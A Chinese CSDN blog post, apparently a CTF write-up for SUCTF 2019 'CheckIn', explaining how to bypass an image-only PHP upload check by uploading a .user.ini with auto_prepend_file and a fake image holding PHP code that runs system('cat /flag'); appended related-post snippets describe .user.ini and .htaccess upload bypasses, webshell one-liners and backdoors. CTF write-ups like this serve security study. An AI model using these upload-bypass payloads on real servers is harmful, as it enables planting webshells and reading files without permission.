.user.ini上传绕过

最新推荐文章于 2024-04-14 15:00:00 发布
最新推荐文章于 2024-04-14 15:00:00 发布
阅读量2.7k 收藏 3
点赞数
分类专栏: web类 文章标签: .user.ini
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ChenZIDu/article/details/101146417
版权

题目是2019SUCTF的Checkln

先进入题目看到的是:

 

文件上传,经过多方尝试之后发现只能上传图片格式的,看了题解之后发现他是

 

getimagesize可以用普通文件,通过设置height以及width来绕过。

这题要求我们使用.user.ini

 

所以,我们可以借助.user.ini轻松让所有php文件都“自动”包含某个文件,而这个文件可以是一个正常php文件,也可以是一个包含一句话的webshell。

1.user.ini文件

#define width 1337
#define height 1337

auto_prepend_file=2.jpg

2.2.jpg

#define width 1337
#define height 1337

<script language="PHP">
system("cat /flag");</script>//cat是读取命令,读取有flag的文件的文件

然后挨个上传,上传成功后会返回一个地址

Your dir uploads/fd40c7f4125a9b9ff1a4e75d293e3080 //地址
Your files : 
array(5) { [0]=> string(1) "." [1]=> string(2) ".." [2]=> string(9) ".user.ini" [3]=> string(5) "2.jpg" [4]=> string(9) "index.php" }

访问地址后:

 

system函数读取文件

如果cpuinfo是个文件的话
system("cat /proc/cpuinfo");

 

ChenZIDu
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
rdpwrap.ini 配置文件 ver.10.0.25*
07-29
4. **检查兼容性**:打开RDP Wrapper的管理工具(如`rdpwrap.ini` 的作者提供的`rdpwrap.exe`),检查"Localhost (Current User)"是否全部显示为"Supported",这表明配置成功。 **注意事项** - 使用RDP Wrapper...
rdpwrap.ini 配置文件 ver.10.0.18.*
06-09
rdpwrap.ini文件的作用在于定义了哪些版本的RDP服务可以被RDPWrap支持并进行多会话绕过。当用户更新Windows系统或者遇到新的RDP服务版本时,可能需要更新这个配置文件以保持兼容性。这些"autogenerated"文件名表明...
文件上漏洞 — .user.ini绕过、后缀大小写绕过
liguangyao213的博客
02-16 3425
web渗透测试最全实战课程--渗透测试视频教程-信息安全-CSDN程序员研修院实战化课程,学完就挖SRC 学会更多实战技巧-https://edu.csdn.net/course/detail/32713 文件上漏洞的相关讲解基于upload-labs靶场,搭建教程见文件上漏洞靶机搭建教程 .user.ini绕过 浏览器访问http://127.0.0.1/Pass-05/index.php进入靶机pass05环境练习页面: (注意:该pass要求php版本大于等于5.3.0版本)
[SUCTF2019]checkin (.user.ini与exif_imagetype()函数绕过
a3320315的博客
11-05 1622
0x01 题目描述 打开网页发现是一个上的页面 1、我们随便上一个php文件试试 错误的后缀名,我们试试上图片 这儿可以猜测是exif_imagetype()函数判断是不是图片,这个很好绕过,在文件头添加图片头就可以了,例如gif的文件头GIF89a 我们在图片中添加php代码。 图片里面不能含有 <?,我们可以用其它语句绕过 <script language=”php”...
文件上-.user.ini的妙用
最新发布
A_991128a的博客
04-14 728
小伙伴们大家好!本期为大家带来的是在文件上漏洞中的妙用。.user.ini.user.ini的妙用原理利用.user.ini的环境实战演示​1、先尝试直接上webshell2、看是否能够上除php和png外的文件3、上.user.ini文件4、再次尝试上webshell5、测试上的.user.ini与webshell是否能够正常生效6、使用连接工具连接webshell。
校赛uploads用.user.ini绕过
..
11-15 900
先看源码: !DOCTYPEhtml> <htmllang="en"> <head> <metacharset="UTF-8"> <metaname="viewport"content="width=device-width,initial-scale=1.0"> <metahttp-equiv="X-UA-Compatible"content="ie=edge"> <title>...
php黑名单绕过,PHP 通过.user.ini 绕过黑名单限制
weixin_35782323的博客
03-11 339
0x00 背景这个估计很多同学看了不屑,认为是烂大街的东西了:那么我来个新的吧:.user.ini。它比.htaccess用的更广,不管是nginx/apache/IIS,只要是以fastcgi运行的php都可以用这个方法。我的nginx服务器全部是fpm/fastcgi,我的IIS php5.3以上的全部用的fastcgi/cgi,我win下的apache上也用的fcgi,可谓很广,不像.hta...
文件上-.user.ini文件
Jim2g
07-29 955
.user.ini 的详细配置介绍链接: https://www.php.net/manual/zh/ini.list.php 使用条件: (1)服务器脚本语言为PHP (2)对应目录下面有可执行的php文件 (3)服务器使用CGI/FastCGI模式 .user.ini.它比.htaccess用的更广,不管是nginx/apache/IIS,只要是以fastcgi运行的php都可以用这个方法。 实例:上.user.ini绕过黑名单检验 GIF89a //绕过exif_i
keil5中的TOOLS.INI文件,容易误删建议保存
03-12
在Keil5的配置和个性化设置中,`TOOLS.INI`文件起着至关重要的作用。这个文件存储了用户的工具链配置、编译器路径、调试器设置等关键信息,是用户工作环境个性化定制的核心。 标题所提及的"keil5中的TOOLS.INI文件...
Django之全局使用request.user.username的实例详解
09-16
主要介绍了Django之全局使用request.user.username的实例详解,具有很好的参考价值,希望对大家有所帮助。一起跟随小编过来看看吧
Buuctf(文件上.uesr.ini绕过)[SUCTF 2019]CheckIn 1
m0_64444909的博客
05-21 2188
解题思路 一.打开题目:发现一个上框,猜测上一句话木马,获取后台shell 二.上.php .phtml .等有关的PHP文件,都显示非法后缀 三.上.htaccess文件
ctfshow web13 文件上.user.ini
m0_46412682的博客
07-16 1962
ctfshow web13 文件上 开始的页面 先上一张正常的照片,显示error file size,这张图片是886k,再上一张小的照片还是error file size 不管先,上一句话木马1.php,提示错误,应该是过滤了后缀名 现在上1.txt,内容为<?php eval($_GET[‘w’]);?>,还是文件大小问题 内容改小一点<?php eval($_GET[w]); 这里我们实现能不能上.htaccess文件,这里是上不了 之前再buuctf中有道也是文件
.user.ini在文件上中的应用
qq_37387187的博客
06-03 437
.user.ini 我们先在php手册上看一下对.user.ini的介绍: 也就是说我们可以在.user.ini中设置php.ini中PHP_INI_PERDIR 和 PHP_INI_USER 模式的 INI 设置,而且只要是在使用 CGI/FastCGI 模式的服务器上都可以使用.user.ini 在p牛的文章中提到了两个有趣的设置:auto_prepend_file和auto_append_file 我们再到手册中看了下这两个设置的定义: 大致意思就是:我们指定一个文件(如a.jpg),那么该文件就
upload靶场第五关 超详细两种绕过方法(含.ini绕过
2301_79650865的博客
02-02 1153
upload靶场第五关 两种超详细绕过方式!包含.user.ini绕过方法及知识点
文件上--.hatccess--.user.ini
qq_43613772的博客
07-24 1806
1、.htaccess文件 文件上: 一般.htaccess可以用来留后门和针对黑名单绕过 文件另存为.htaccess写入: AddType application/x-httpd-php .png //png文件解析为php文件 上.htaccess 必须是网站根路径 留后门: 可以在.htaccess 加入php解析规则 类似于把文件名包含1的解析成php <FilesMatch "1"> SetHandler application/x-httpd-php </Fi
.user.ini在后门中的利用
火柴人的博客
04-06 665
转载user.ini文件构成的PHP后门 0x00 背景 这个估计很多同学看了不屑,认为是烂大街的东西了: .htaccess文件构成的PHP后门 那么我来个新的吧:.user.ini。它比.htaccess用的更广,不管是nginx/apache/IIS,只要是以fastcgi运行的php都可以用这个方法。我的nginx服务器全部是fpm/fastcgi,我的IIS php5.3以上的全部用的f...
黑名单文件上绕过
SoulCat
10-24 1531
黑名单文件上绕过 我在西北,一山又一山。与你相隔,一关又一关。 漏洞概述: .htaccess用于Apache .user.ini用于php 漏洞复现: .user.ini 原理: .user.ini将所有php文件自动包含任意木马文件执行。 使用条件: 只要以cgi/FastCGI/fpm模式运行的php,并且上目录下要有正常可执行的php文件,都可以成功包含 上1.user....
神秘的.user.ini文件
guanling881023的博客
03-21 2685
神秘的.user.ini文件.user.ini究竟是个神秘东东?我们看看官方怎么说:http://php.net/manual/zh/conf...自 PHP 5.3.0 起,PHP 支持基于每个目录的 .htaccess 风格的 INI 文件。此类文件仅被 CGI/FastCGI SAPI 处理。此功能使得 PECL 的 htscanner 扩展作废。如果使用 Apache,则用 .htacce...
文件上.user.ini使用
09-10
在使用文件上时,你可以使用 `user.ini` 文件来设置上文件大小限制等参数。 以下是在 `user.ini` 中设置文件上大小限制的示例: ``` upload_max_filesize = 20M post_max_size = 20M ``` 这会将上文件的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值